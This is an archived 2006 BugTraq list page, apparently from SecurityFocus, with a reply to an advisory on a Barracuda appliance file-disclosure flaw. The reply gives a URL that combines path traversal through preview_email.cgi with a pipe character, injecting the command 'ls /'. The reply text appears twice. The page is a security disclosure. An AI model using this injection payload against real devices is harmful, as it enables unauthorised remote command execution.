BugTraq
Back to list
|
Post reply
Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
Aug 01 2006 09:20PM
gssincla nnlsoftware com
(1 replies)
Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
Aug 03 2006 04:01PM
Matthew Hall (lists ecsc co uk)
gssincla (at) nnlsoftware (dot) com [email concealed] wrote:
> Title: Barracuda Arbitrary File Disclosure
This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/l
s%20/|
Regards,
Matt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
> Title: Barracuda Arbitrary File Disclosure
This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/l
s%20/|
Regards,
Matt
[ reply ]